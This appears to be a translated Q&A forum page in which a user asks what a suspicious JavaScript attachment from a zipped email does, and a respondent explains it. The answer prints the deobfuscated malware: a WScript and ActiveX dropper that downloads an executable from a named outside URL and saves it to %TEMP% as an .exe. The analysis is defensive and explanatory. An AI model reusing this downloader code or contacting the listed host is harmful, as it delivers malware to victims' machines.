¿Qué está tratando de hacer / explotar Javascript? [duplicar]

Navega tus respuestas
1

Encontré el siguiente javascript en un archivo adjunto .zip en un correo electrónico. (Dicho archivo zip se abrió en una nueva máquina virtual KVM sin ninguno de mis datos mientras ejecutaba una sesión de Ubuntu LiveCD. Solo para estar lo más seguro posible).

enlace

¿Alguien me puede dar una idea de lo que se intenta hacer aquí?

(Le escribí al autor del correo electrónico nuevamente y le pedí una copia de su archivo adjunto NO en un archivo zip, ya que "muchos virus se propagan mediante archivos zip dañados adjuntos al correo electrónico, por lo que no los abriremos". Veré lo que pasa.)

    
pregunta Azendale 24.04.2016 - 23:12
fuente

1 respuesta

3

Como primer paso, ejecute el código a través de un JS beautifier en el código para realizar algunos escapes.

Nota, verás varios patrones como:

Fake["hostkey" ["replace"](/hostkey/, "write")]

que dentro de los corchetes es equivalente a "hostkey".replace(/hostkey/, "write") que se evalúa a solo "write" o Fake.write . También

El grueso de la actividad parece estar en el script escrito al concatenar un grupo de variables (línea 124 de su archivo). Esos comandos, una vez desenfocados un poco son: 

var _ = 27570,
    Keyword = "serious";
var multi_resize = 0;
var update_results = "characters_excluding_spaces",
    looks = "search_errors",
    postSelector = "f347";
Dakar = "targetParent", _actual_db_id = "deactivate_plugin", populates = 2;
e032 = "v_path_info", These = "ExpandEnvironmen";
wp_ajax_send_link_to_editor = "x00FF";
places = "tStrings", retries = "menuControl";
list = "http://dermosihhat.abdu", AuthorURI = 1,
    propertychange = "llahaktay.com/image/";
fff8e5 = "flags/.../403.php?";
triplet = "already_has_default",
    sanitize_option_ = "f=404";

textTopHei$ght = function() {
    Keyword = update_results = looks = this;
    Dakar = Keyword["WScript"];
    _actual_db_id = Dakar["CreateObject"]("WScript.Shell");
};
textTopHei$ght();
e032 = _actual_db_id[These + places]("%TEMP%/") + "5w5xGKQ9WE.exe";
try {
    this = "Reformat";
} catch (flush) {
    retries = new update_results["ActiveXObject"]("Msxml2.XMLHTTP.6.0");
}
new_branch = function() {
    retries.open("GET", "http://dermosihhat.abdullahaktay.com/image/flags/.../403.php?f=404", +multi_resize);
    retries.send();
    Dakar.Sleep(1000);
};
new_branch();
slidEvent = function() {
    postSelector = new looks["ActiveXObject"]("ADODB.Stream"));
};
slidEvent();
postSelector.open();
postSelector.type = +AuthorURI;
wp_ajax_send_link_to_editor = postSelector;
wp_ajax_send_link_to_editor.write(retries["ResponseBody"]);
wp_ajax_send_link_to_editor.position = 0;
postSelector["saveToFile"](e032, +populates);
triplet = postSelector;
triplet["close"]();

Parece estar haciendo muchas cosas de ActiveX (con las que no estoy familiarizado) (WScript), así como realizar una solicitud a la siguiente URL maliciosa ( enlace ) que parece ser un binario de windows / DOS. (Comienza con bytes MZ y tiene el texto "Este programa no se puede ejecutar en modo DOS" cerca del comienzo.) .

Parece que está utilizando ActiveX para descargar este ejecutable y engañarlo para que lo ejecute, aunque no sé qué hace el ejecutable. (No soy un usuario de Windows y no estoy seguro de todos los detalles de ActiveX).

    
respondido por el dr jimbob 25.04.2016 - 00:17
fuente

Lea otras preguntas en las etiquetas

¿Existe un beneficio adicional para la autenticación dentro de una parte de una aplicación, después de la autenticación en la aplicación principal? Mismo certificado pero diferentes claves privadas en diferentes servidores. ¿Esto funciona?